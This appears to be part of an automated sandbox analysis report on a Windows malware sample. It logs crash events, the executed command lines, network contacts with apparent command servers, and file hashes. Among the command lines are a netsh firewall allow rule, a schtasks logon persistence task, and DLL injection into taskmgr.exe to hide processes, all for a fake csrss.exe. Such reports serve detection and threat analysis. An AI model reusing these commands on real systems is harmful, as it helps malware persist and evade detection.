N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe

"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 368

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 612

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 716

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 776

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 640

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 864

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 868

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 860

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1116 -ip 1116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1116 -s 920

C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe

"C:\Users\Admin\AppData\Local\Temp\6fd9d52463f7b9444ae84fccccc96a3b.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 332

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 524

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 484

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 488

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 776

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 508

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1660

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1424

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4392 -ip 4392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1444

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe ""

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 368

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 200 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 704

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 712

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 636

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 976

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 992

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1072

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4676 -ip 4676

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1544

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1648

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1612

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4676 -ip 4676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1580

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4676 -ip 4676

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 16.53.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 humisnee.com udp
NL 37.48.65.151:443 humisnee.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 151.65.48.37.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 205.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 survey-smiles.com udp
US 199.59.243.225:80 survey-smiles.com tcp
US 8.8.8.8:53 225.243.59.199.in-addr.arpa udp
US 8.8.8.8:53 ninhaine.com udp
US 8.8.8.8:53 2makestorage.com udp
US 8.8.8.8:53 nisdably.com udp
US 8.8.8.8:53 cf4ea508-d72e-4eb6-87d4-a7de1c0f1efe.ninhaine.com udp
US 8.8.8.8:53 server10.ninhaine.com udp
CZ 46.8.8.100:443 server10.ninhaine.com tcp
CZ 46.8.8.100:443 server10.ninhaine.com tcp
CZ 46.8.8.100:443 server10.ninhaine.com tcp
US 8.8.8.8:53 ww82.ninhaine.com udp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 100.8.8.46.in-addr.arpa udp
US 8.8.8.8:53 spolaect.info udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
CZ 46.8.8.100:443 server10.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp

Files

memory/1116-1-0x0000000005020000-0x0000000005466000-memory.dmp

memory/1116-2-0x0000000005470000-0x0000000005D96000-memory.dmp

memory/1116-3-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/1116-4-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/1116-6-0x0000000005470000-0x0000000005D96000-memory.dmp

memory/4392-7-0x0000000004D40000-0x0000000005181000-memory.dmp

memory/4392-8-0x0000000000400000-0x00000000030EF000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 a38abd5135bd7dd303e36d98b66ba72a
SHA1 f964b8b231631cb299e40565b93afbc39ee37959
SHA256 fab958b19764e9d129d91caaf0631a76ebc4697a5080d6e331dc27d924621b45
SHA512 06032e323cccd5ef99afe6bc1b799a7273c2c82ad843b65af1497847f11093ac33b5d414ed82b4039950f4067f5625badaddc501e501084b5f0da2bfe6f13fdd

C:\Windows\rss\csrss.exe

MD5 fdc2ab5431888ecf6f7c0e674e8812d9
SHA1 e62c381ac3b782e2f5b82bae97c797757d0e375b
SHA256 fb70708694f1d8d7881fcced3dc6d8319affe8db6ce3bd91591bc1826a22fabe
SHA512 3b97e3a723fd4cb04a37328bb7f6fe2acd3eaaf470c1161aa61bb7755163f76fbd45b4e46f5a7ab907e61c6056e9e082118d420f17a510761b2b7d62ac67b8d7

memory/4392-18-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-19-0x0000000005200000-0x0000000005700000-memory.dmp

memory/4676-20-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-21-0x0000000000400000-0x00000000030EF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 25475beab23b020b3b25e215333f4db1
SHA1 dba5b352c8df85dcdef4c7206a8410bbcb32fca8
SHA256 451a6c64803fc2257eb8520893dad30e264c3005535f6305bab233797095d096
SHA512 8dd0997a8418f10118f99fe72036d633917c6951d4210685d5f38956fe34a10913ee8e7bb02f808defb4d571eeeb086a804fb259b8d3e8d261a4f974662e917a

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 395ae7c9cccebd73de9e6de2d543279d
SHA1 2805fbce7d93fe5258269247af4033f211561820
SHA256 846af15e1c9c6b2e76e87a35943266de1b15ed2564e67bcae7040ecabbde53a6
SHA512 063544b4fb4b8b228f39c1ee4b98b2f1c7f091c158793271f18272c23d13a0cc3a87442b02d9887d594a73a80a9adb26c0369126924a66d9541c3335892da892

memory/4676-27-0x0000000005200000-0x0000000005700000-memory.dmp

memory/4676-28-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-29-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-30-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-31-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-32-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-33-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-34-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-35-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-36-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-37-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-38-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-39-0x0000000000400000-0x00000000030EF000-memory.dmp

memory/4676-40-0x0000000000400000-0x00000000030EF000-memory.dmp